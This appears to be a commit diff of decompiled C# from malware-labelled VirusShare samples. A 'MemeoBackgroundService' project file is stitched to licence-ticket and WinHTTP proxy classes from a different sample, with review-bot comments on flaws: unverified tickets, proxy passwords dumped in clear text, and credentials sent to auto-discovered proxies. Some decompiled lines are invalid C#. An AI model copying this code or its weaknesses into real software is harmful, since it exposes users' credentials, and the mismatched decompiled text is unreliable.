<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2C743BD4-9849-4456-B717-ED010ADD43E4}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>MemeoBackgroundService</AssemblyName>
<ApplicationVersion>2.0.0.1</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.ServiceProcess" />
</ItemGroup>
<ItemGroup>
<Compile Include="RemoteServerService\MemeoBackgroundService.cs" />
<Compile Include="MemeoBackgroundService\ProjectInstaller.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="MemeoBackgroundService\ProjectInstaller.resx" />
<EmbeddedResource Include="RemoteServerService\MemeoBackgroundService.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MemeoBackgroundService", "Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.csproj", "{2C743BD4-9849-4456-B717-ED010ADD43E4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2C743BD4-9849-4456-B717-ED010ADD43E4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,289 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Activation
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.Broker.Config;
using Bmc.RegistryAccess;
using Bmc.Services.Ticket;
using Net.LShift.SPKI;
using Net.LShift.Utilities;
using System;
using System.Collections;
using System.Collections.Specialized;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
namespace Bmc.Broker
{
public class Activation
{
public static readonly TimeSpan MAX_TICKET_AGE = TimeSpan.FromMilliseconds(1000.0);
private ITicket _ticketService;
private SPKISexp _ticket = (SPKISexp) null;
private DateTime _ticketTimestamp = DateTime.MinValue;
public static Activation Instance => SingletonFactory.GetInstance(typeof (Activation)) as Activation;
public event SimpleDelegate OnSuccessfulFetch;
private ITicket TicketService
{
get
{
lock (this)
{
if (this._ticketService == null)
{
try
{
ChannelServices.RegisterChannel((IChannel) new TcpChannel());
}
catch (Exception ex)
{
}
string url = "tcp://localhost:" + ConfigurationManager.Instance[(FIELD) 6] + "/" + Constants.URI;
try
{
this._ticketService = (ITicket) Activator.GetObject(typeof (ITicket), url);
}
catch (Exception ex)
{
throw ex;
}
}
return this._ticketService;
}
}
}
public bool TicketOK
{
get
{
try
{
SPKISexp ticket = this.Ticket;
return true;
}
catch (Exception ex)
{
return false;
}
}
}
public bool StateOK
{
get
{
try
{
this.TicketService.GetTime();
return true;
}
catch (Exception ex)
{
return false;
}
}
}
public void FetchTicket()
{
this.TicketService.FetchTicket();
this._ticketTimestamp = DateTime.MinValue;
if (this.OnSuccessfulFetch == null)
return;
this.OnSuccessfulFetch.Invoke();
}
public void WipeState() => this.TicketService.WipeState();
public void RegisterInstance(int port, string auth) => this.TicketService.RegisterInstance(port, auth);
public SPKISexp Ticket
{
get
{
lock (this)
{
try
{
this._ticket = (SPKISexp) null;
this._ticket = this.TicketService.GetTicket();
return this._ticket;
}
finally
{
SPKISexp ticket = this._ticket;
this._ticketTimestamp = DateTime.Now;
}
}
}
}
public SPKISexp LazyTicket
{
get
{
try
{
lock (this)
return DateTime.Now - this._ticketTimestamp > Activation.MAX_TICKET_AGE ? this.Ticket : this._ticket;
}
catch (Exception ex)
{
return (SPKISexp) null;
}
}
}
public TicketState GetState() => Activation.GetState(this.Ticket, this.TicketService.GetTime());
public string Version
{
get
{
SPKISexp lazyTicket = this.LazyTicket;
return lazyTicket != null ? Activation.GetState(lazyTicket, DateTime.Now).GetProperty("bbm", "softwareversion") : (string) null;
}
}
public static TicketState GetState(SPKISexp ticket, DateTime now)
{
try
{
IDictionary states = (IDictionary) new Hashtable();
SPKISexp spkiSexp1 = ticket[nameof (ticket)]["packages"];
for (int index1 = 1; index1 < spkiSexp1.Length; ++index1)
{
SPKISexp spkiSexp2 = spkiSexp1[index1];
if (!spkiSexp2.IsLeaf && spkiSexp2.SexpName == "package")
{
PackageState packageState = new PackageState();
packageState.Permissions = new StringCollection();
packageState.Products = (IDictionary) new Hashtable();
packageState.Package = spkiSexp2.Get("name").Name;
states.Add((object) packageState.Package, (object) packageState);
SPKISexp spkiSexp3 = spkiSexp2["transitions"];
if (spkiSexp3.Length % 2 != 0)
throw new BadTicketException("Odd number of members in transitions");
int num = 2;
while (num < spkiSexp3.Length && !(spkiSexp3[num].ToDateTime() > now))
num += 2;
packageState.CurrentState = spkiSexp3[num - 1].Name;
packageState.LastTransition = num - 2 >= 2 ? spkiSexp3[num - 2].ToDateTime() - now : TimeSpan.MinValue;
if (num + 1 >= spkiSexp3.Length)
{
packageState.NextTransition = TimeSpan.MaxValue;
packageState.NextState = (string) null;
}
else
{
packageState.NextTransition = spkiSexp3[num].ToDateTime() - now;
packageState.NextTransitionDate = spkiSexp3[num].ToDateTime();
packageState.NextState = spkiSexp3[num + 1].Name;
}
SPKISexp spkiSexp4 = spkiSexp2["states"];
SPKISexp spkiSexp5 = (SPKISexp) null;
for (int index2 = 1; index2 < spkiSexp4.Length; ++index2)
{
SPKISexp spkiSexp6 = spkiSexp4[index2];
if (spkiSexp6.SexpName.Equals("state") && spkiSexp6[1].Name.Equals(packageState.CurrentState))
{
spkiSexp5 = spkiSexp6;
break;
}
}
if (spkiSexp5 != null)
{
try
{
SPKISexp spkiSexp7 = spkiSexp5["permissions"];
for (int index3 = 1; index3 < spkiSexp7.Length; ++index3)
packageState.Permissions.Add(spkiSexp7[index3].Name);
}
catch (AccessException ex)
{
}
try
{
SPKISexp spkiSexp8 = spkiSexp5["products"];
for (int index4 = 1; index4 < spkiSexp8.Length; ++index4)
{
SPKISexp spkiSexp9 = spkiSexp8[index4];
if (!spkiSexp9.IsLeaf)
{
if (spkiSexp9.SexpName == "product")
{
try
{
string name1 = spkiSexp9[1].Name;
ProductState productState = new ProductState();
productState.Product = name1;
packageState.Products[(object) name1] = (object) productState;
productState.Properties = (IDictionary) new Hashtable();
productState.Permissions = new StringCollection();
SPKISexp spkiSexp10 = spkiSexp9["properties"];
for (int index5 = 1; index5 < spkiSexp10.Length; ++index5)
{
SPKISexp spkiSexp11 = spkiSexp10[index5];
if (!spkiSexp11.IsLeaf && spkiSexp11.SexpName == "property")
{
string name2 = spkiSexp11[1].Name;
string name3 = spkiSexp11[2].Name;
productState.Properties[(object) name2] = (object) name3;
}
}
SPKISexp spkiSexp12 = spkiSexp9["permissions"];
for (int index6 = 1; index6 < spkiSexp12.Length; ++index6)
productState.Permissions.Add(spkiSexp12[index6].Name);
}
catch (AccessException ex)
{
}
}
}
}
}
catch (AccessException ex)
{
}
}
}
}
return new TicketState(states);
}
catch (AccessException ex)
{
throw new BadTicketException("missing fields", (Exception) ex);
}
}
public void CheckForPermission(string product, string permission)
{
if (!this.GetState().HasPermission(product, permission))
throw new PermissionDeniedException();
}
public bool GetPermission(string product, string permission)
{
try
{
return this.GetState().HasPermission(product, permission);
}
catch (NoTicketException ex)
{
return false;
}
catch (Exception ex)
{
return false;
}
}
public string GetProperty(string prodId, string propName) => this.GetState().GetProperty(prodId, propName);
}
}
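Review bot: `GetState(SPKISexp, DateTime)` turns the ticket's `permissions` and `products` entries directly into granted permissions, and nothing in this file checks a signature or issuer on the ticket before `CheckForPermission` and `GetPermission` rely on it. The ticket comes from `Activator.GetObject` over a default `TcpChannel` at `tcp://localhost:` plus a configured port, so unless the `ITicket` service (not shown here) verifies it, the result is only as trustworthy as whatever process is listening on that port. A comment on the `Ticket` getter saying where verification happens would help, e.g. `// ticket signature is verified by <component>; this class only parses it`. In the `TicketService` getter, `catch (Exception ex) { throw ex; }` discards the original stack trace and should be `throw;` (or the try removed), and the empty catch around `ChannelServices.RegisterChannel` hides every registration failure.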
@@ -0,0 +1,142 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Config.ConfigurationManager
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.RegistryAccess;
using Microsoft.Win32;
using Net.LShift.Utilities;
using System;
using System.IO;
using System.Xml;
namespace Bmc.Broker.Config
{
public class ConfigurationManager
{
public static ConfigurationManager Instance => SingletonFactory.GetInstance(typeof (ConfigurationManager)) as ConfigurationManager;
public string this[FIELD f]
{
get => RegistryFields.Instance[f];
set => RegistryFields.Instance[f] = value;
}
public Uri ProtocolUri => new Uri(this[(FIELD) 1]);
public Uri MessagingUri => new Uri(this[(FIELD) 2]);
public Uri ProtocolRelUri(string path) => new Uri(this.ProtocolUri, path);
public Uri MessagingRelUri(string path) => new Uri(this.MessagingUri, path);
public bool IsProductAvailable(string prodId)
{
string path = this.ProductExePath(prodId);
return path != null && File.Exists(path);
}
private string GetProductValue(string prodId, string valueName)
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(BuildVersion.ProductRegistryKey).OpenSubKey("Products");
if (registryKey1 != null)
{
try
{
RegistryKey registryKey2 = registryKey1.OpenSubKey(prodId);
if (registryKey2 != null)
{
try
{
return (string) registryKey2.GetValue(valueName);
}
finally
{
registryKey2.Close();
}
}
}
finally
{
registryKey1.Close();
}
}
return (string) null;
}
public string ProductExePath(string prodId) => this.GetProductValue(prodId, "ExePath");
public bool RegistryIsSane
{
get
{
try
{
Uri protocolUri = this.ProtocolUri;
Uri messagingUri = this.MessagingUri;
return Directory.Exists(this[(FIELD) 3]);
}
catch (Exception ex)
{
return false;
}
}
}
public XmlDocument Xml
{
get
{
XmlDocument xml = new XmlDocument();
xml.LoadXml("<state/>");
foreach (FIELD field in Enum.GetValues(typeof (FIELD)))
{
FIELD f = (FIELD) ^(int&) ref field;
XmlElement element = xml.CreateElement("field");
xml.DocumentElement.AppendChild((XmlNode) element);
try
{
element.InnerText = this[f];
}
catch (Exception ex)
{
element = xml.CreateElement("exception");
element.InnerText = ex.ToString();
xml.DocumentElement.AppendChild((XmlNode) element);
}
element.SetAttribute("name", ((Enum) (object) f).ToString());
}
return xml;
}
}
public void WipeState()
{
FIELD[] fieldArray = new FIELD[7]
{
(FIELD) 5,
(FIELD) 8,
(FIELD) 9,
(FIELD) 10,
(FIELD) 11,
(FIELD) 13,
(FIELD) 14
};
foreach (int num in fieldArray)
{
FIELD field = (FIELD) num;
RegistryKey registryKey = RegistryFields.ConfigKey(field, true);
try
{
registryKey.DeleteValue(((Enum) (object) field).ToString(), false);
}
finally
{
registryKey.Flush();
registryKey.Close();
}
}
}
}
}
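Review bot: The `Xml` getter writes the value of every `FIELD` into the returned document, and `ProxyComponent` in this commit reads `(FIELD) 13` and `(FIELD) 14` as the proxy user name and password, so any diagnostic dump built from `Xml` carries those credentials in clear text next to full `ex.ToString()` output. Skipping or masking those fields before `element.InnerText = this[f];` would avoid that. In `GetProductValue`, `Registry.LocalMachine.OpenSubKey(BuildVersion.ProductRegistryKey).OpenSubKey("Products")` dereferences the first key without a null check and never closes it; the null test only covers the second key. The line `FIELD f = (FIELD) ^(int&) ref field;` is decompiler output that is not valid C# and presumably stood for `FIELD f = field;`.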
@@ -0,0 +1,28 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.PackageState
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Collections;
using System.Collections.Specialized;
namespace Bmc.Broker
{
public class PackageState
{
public string Package;
public TimeSpan LastTransition;
public string CurrentState;
public TimeSpan NextTransition;
public DateTime NextTransitionDate;
public string NextState;
public StringCollection Permissions;
public IDictionary Products;
public bool HasPermission(string productName, string perm) => productName != null && this.Products.Contains((object) productName) && ((ProductState) this.Products[(object) productName]).Permissions.Contains(perm) || this.Permissions.Contains(perm);
public string GetProperty(string productName, string propName) => !this.Products.Contains((object) productName) ? (string) null : ((ProductState) this.Products[(object) productName]).GetProperty(propName);
}
}
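Review bot: `GetProperty` passes `productName` straight to `this.Products.Contains`, without the `productName != null` guard that `HasPermission` has on the line above; `Activation.GetState` assigns a `Hashtable` to `Products`, and `Hashtable.Contains` throws `ArgumentNullException` for a null key. Guarding it the same way keeps the two methods consistent: `productName == null || !this.Products.Contains((object) productName) ? (string) null : ...`. `ProductState.GetProperty` in the next file has the same unguarded `Properties.Contains((object) propName)`. Both types also assume `Products`, `Permissions` and `Properties` were assigned, which these public fields do not enforce.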
@@ -0,0 +1,20 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.ProductState
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Collections;
using System.Collections.Specialized;
namespace Bmc.Broker
{
public class ProductState
{
public string Product;
public IDictionary Properties;
public StringCollection Permissions;
public string GetProperty(string propName) => !this.Properties.Contains((object) propName) ? (string) null : (string) this.Properties[(object) propName];
}
}
@@ -0,0 +1,120 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.ProxyComponent
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.Broker.Config;
using Bmc.RegistryAccess;
using Microsoft.Win32;
using Net.LShift.Utilities;
using System;
using System.Net;
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
public class ProxyComponent
{
public const int WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0;
public const int WINHTTP_ACCESS_TYPE_NO_PROXY = 1;
public const int WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3;
private const int WINHTTP_AUTOPROXY_AUTO_DETECT = 1;
private const int WINHTTP_AUTOPROXY_CONFIG_URL = 2;
private const int WINHTTP_AUTOPROXY_RUN_INPROCESS = 65536;
private const int WINHTTP_AUTOPROXY_RUN_OUTPROCESS_ONLY = 131072;
private const int WINHTTP_AUTO_DETECT_TYPE_DHCP = 1;
private const int WINHTTP_AUTO_DETECT_TYPE_DNS_A = 2;
private static readonly IntPtr WINHTTP_NO_PROXY_NAME = IntPtr.Zero;
private static readonly IntPtr WINHTTP_NO_PROXY_BYPASS = IntPtr.Zero;
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr WinHttpOpen(
string pwszUserAgent,
int dwAccessType,
IntPtr pwszProxyName,
IntPtr pwszProxyBypass,
int dwFlags);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpCloseHandle(IntPtr hInternet);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpGetProxyForUrl(
IntPtr hSession,
string lpcwszUrl,
ref WINHTTP_AUTOPROXY_OPTIONS pAutoProxyOptions,
ref WINHTTP_PROXY_INFO pProxyInfo);
[DllImport("winhttp.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern bool WinHttpGetIEProxyConfigForCurrentUser(
ref WINHTTP_CURRENT_USER_IE_PROXY_CONFIG pProxyConfig);
public static ProxyComponent Instance => SingletonFactory.GetInstance(typeof (ProxyComponent)) as ProxyComponent;
public void SetupForProxy(WebRequest request)
{
IWebProxy proxy = this.GetProxy(request);
if (proxy == null)
return;
proxy.Credentials = (ICredentials) this.ProxyCredential;
request.Proxy = proxy;
}
private IWebProxy GetProxy(WebRequest request)
{
ProxyInfo proxy = (ProxyInfo) null;
try
{
if (this.GetProxyAutoDetect())
proxy = ProxyComponent.GetDynamicProxyForUrl(request.RequestUri.ToString());
}
catch (Exception ex)
{
proxy = (ProxyInfo) null;
}
if (proxy != null)
return (IWebProxy) proxy;
return this.GetProxyEnable() ? (IWebProxy) WebProxy.GetDefaultProxy() : (IWebProxy) null;
}
public NetworkCredential ProxyCredential => this.ProxyUserName == "" && this.ProxyPassword == "" ? (NetworkCredential) null : new NetworkCredential(this.ProxyUserName, this.ProxyPassword);
private bool GetProxyAutoDetect()
{
WINHTTP_CURRENT_USER_IE_PROXY_CONFIG pProxyConfig = new WINHTTP_CURRENT_USER_IE_PROXY_CONFIG();
ProxyComponent.WinHttpGetIEProxyConfigForCurrentUser(ref pProxyConfig);
return pProxyConfig.fAutoDetect;
}
private bool GetProxyEnable() => (int) Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Internet settings", false).GetValue("ProxyEnable") != 0;
private string ProxyUserName => ConfigurationManager.Instance[(FIELD) 13];
private string ProxyPassword => ConfigurationManager.Instance[(FIELD) 14];
public static ProxyInfo GetDynamicProxyForUrl(string addressUrl)
{
IntPtr num = ProxyComponent.WinHttpOpen(BuildVersion.ProductTitle, 0, ProxyComponent.WINHTTP_NO_PROXY_NAME, ProxyComponent.WINHTTP_NO_PROXY_BYPASS, 0);
if (num == IntPtr.Zero)
return (ProxyInfo) null;
try
{
WINHTTP_AUTOPROXY_OPTIONS pAutoProxyOptions = new WINHTTP_AUTOPROXY_OPTIONS();
pAutoProxyOptions.dwFlags = 1;
pAutoProxyOptions.dwAutoDetectFlags = 3;
pAutoProxyOptions.fAutoLoginIfChallenged = true;
WINHTTP_PROXY_INFO pProxyInfo = new WINHTTP_PROXY_INFO();
if (!ProxyComponent.WinHttpGetProxyForUrl(num, addressUrl, ref pAutoProxyOptions, ref pProxyInfo))
return (ProxyInfo) null;
ProxyInfo dynamicProxyForUrl = new ProxyInfo();
dynamicProxyForUrl.LoadFrom(pProxyInfo);
return dynamicProxyForUrl;
}
finally
{
ProxyComponent.WinHttpCloseHandle(num);
}
}
}
}
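Review bot: `SetupForProxy` attaches the stored `ProxyCredential` to whichever proxy `GetProxy` returns, including one found by `GetDynamicProxyForUrl` through auto-discovery (`dwAutoDetectFlags = 3`, i.e. DHCP and DNS) with `fAutoLoginIfChallenged = true`. On a network where the auto-discovery answer is not trustworthy, that offers the configured proxy user name and password, and the user's domain credentials during the PAC fetch, to a host the application did not choose. Consider applying the stored credentials only to an explicitly configured proxy and setting `pAutoProxyOptions.fAutoLoginIfChallenged = false;`. `GetProxyEnable` also dereferences `OpenSubKey(...)` and unboxes `GetValue("ProxyEnable")` without null checks, and it is called outside the try in `GetProxy`, so a missing key or value throws out of `SetupForProxy`; the opened key is never closed.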
@@ -0,0 +1,110 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.ProxyInfo
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Collections;
using System.Net;
using System.Text.RegularExpressions;
namespace Bmc.Broker.Proxy
{
public class ProxyInfo : IWebProxy
{
public static readonly Regex schematizedProxyRegex = new Regex("^([a-zA-Z]+)=(.*)");
public static readonly Regex hostAndPortRegex = new Regex("^[a-zA-Z0-9.]+:[0-9]+");
private static readonly char[] splitChars = new char[5]
{
' ',
';',
'\n',
'\r',
'\t'
};
private ICredentials creds;
public bool useProxy;
public Hashtable proxies;
public Uri defaultProxy;
public string[] bypassDomains;
public bool bypassLocal;
public ProxyInfo()
{
this.creds = (ICredentials) null;
this.useProxy = false;
this.proxies = new Hashtable();
this.defaultProxy = (Uri) null;
this.bypassDomains = new string[0];
this.bypassLocal = true;
}
private Uri UriFrom(string str) => str.IndexOf(':') == -1 || ProxyInfo.hostAndPortRegex.Match(str).Success ? new Uri("http://" + str) : new Uri(str);
public void LoadFrom(WINHTTP_PROXY_INFO wpi)
{
if (wpi.dwAccessType == 1)
{
this.useProxy = false;
}
else
{
this.useProxy = true;
foreach (string str in wpi.lpszProxy == null ? new string[0] : wpi.lpszProxy.Split(ProxyInfo.splitChars))
{
Match match = ProxyInfo.schematizedProxyRegex.Match(str);
if (match.Success)
this.proxies[(object) match.Groups[1].ToString()] = (object) this.UriFrom(match.Groups[2].ToString());
else
this.defaultProxy = this.UriFrom(str);
}
this.bypassDomains = wpi.lpszProxyBypass == null ? new string[0] : wpi.lpszProxyBypass.Split(ProxyInfo.splitChars);
this.bypassLocal = false;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain == "<local>")
{
this.bypassLocal = true;
break;
}
}
if (!this.bypassLocal)
return;
string[] strArray = new string[this.bypassDomains.Length - 1];
int num = 0;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain != "<local>")
strArray[num++] = bypassDomain;
}
this.bypassDomains = strArray;
}
}
public ICredentials Credentials
{
get => this.creds;
set => this.creds = value;
}
public Uri GetProxy(Uri dest)
{
if (!this.useProxy)
return (Uri) null;
return this.proxies.ContainsKey((object) dest.Scheme) ? (Uri) this.proxies[(object) dest.Scheme] : this.defaultProxy;
}
public bool IsBypassed(Uri dest)
{
if (!this.useProxy || this.bypassLocal && (dest.IsLoopback || dest.Host.IndexOf('.') == -1))
return true;
foreach (string bypassDomain in this.bypassDomains)
{
if (bypassDomain == dest.Host)
return true;
}
return false;
}
}
}
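Review bot: `LoadFrom` splits `lpszProxy` on five separator characters without dropping empty tokens, so a list such as `a:8080; b:8080` (constructed example) yields an empty entry, and `UriFrom("")` then calls `new Uri("http://")`, which throws `UriFormatException` out of `LoadFrom`. Skipping blanks at the top of the loop fixes it: `if (str.Length == 0) continue;`. `IsBypassed` compares each bypass entry to `dest.Host` with ordinal `==`, so entries that differ in case or use wildcards (for example `*.example.test`, constructed) never match and those hosts are sent through the proxy. `hostAndPortRegex` has no `$` anchor and excludes `-`, so a hyphenated host with a port falls through to `new Uri(str)` and is parsed with the host name as the scheme.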
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_AUTOPROXY_OPTIONS
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System;
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_AUTOPROXY_OPTIONS
{
[MarshalAs(UnmanagedType.U4)]
public int dwFlags;
[MarshalAs(UnmanagedType.U4)]
public int dwAutoDetectFlags;
public string lpszAutoConfigUrl;
public IntPtr lpvReserved;
[MarshalAs(UnmanagedType.U4)]
public int dwReserved;
public bool fAutoLoginIfChallenged;
}
}
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
{
public bool fAutoDetect;
public string lpszautoConfigUrl;
public string lpszProxy;
public string lpszProxyBypass;
}
}
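Review bot: The string members here are declared as `string`, but WinHTTP allocates the buffers it returns in this structure and documents that the caller must release them with `GlobalFree`; with `string` fields the marshaller, not the caller, decides how the native buffers are released, which as far as I know is `CoTaskMemFree`. Declaring them as `IntPtr`, reading them with `Marshal.PtrToStringUni` and freeing them explicitly would make ownership correct and visible. `WINHTTP_PROXY_INFO` in the next file is filled by `WinHttpGetProxyForUrl` and has the same issue. `GetProxyAutoDetect` in `ProxyComponent` also ignores the `bool` result of `WinHttpGetIEProxyConfigForCurrentUser`, so a failed call reads `fAutoDetect` from a default-initialised struct.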
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.Proxy.WINHTTP_PROXY_INFO
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using System.Runtime.InteropServices;
namespace Bmc.Broker.Proxy
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WINHTTP_PROXY_INFO
{
[MarshalAs(UnmanagedType.U4)]
public int dwAccessType;
public string lpszProxy;
public string lpszProxyBypass;
}
}
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Bmc.Broker.ResourceSystem.DebugManager
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
namespace Bmc.Broker.ResourceSystem
{
public class DebugManager
{
public static void Init(ResourceManager resourceManager)
{
}
public static void Shutdown()
{
}
}
}
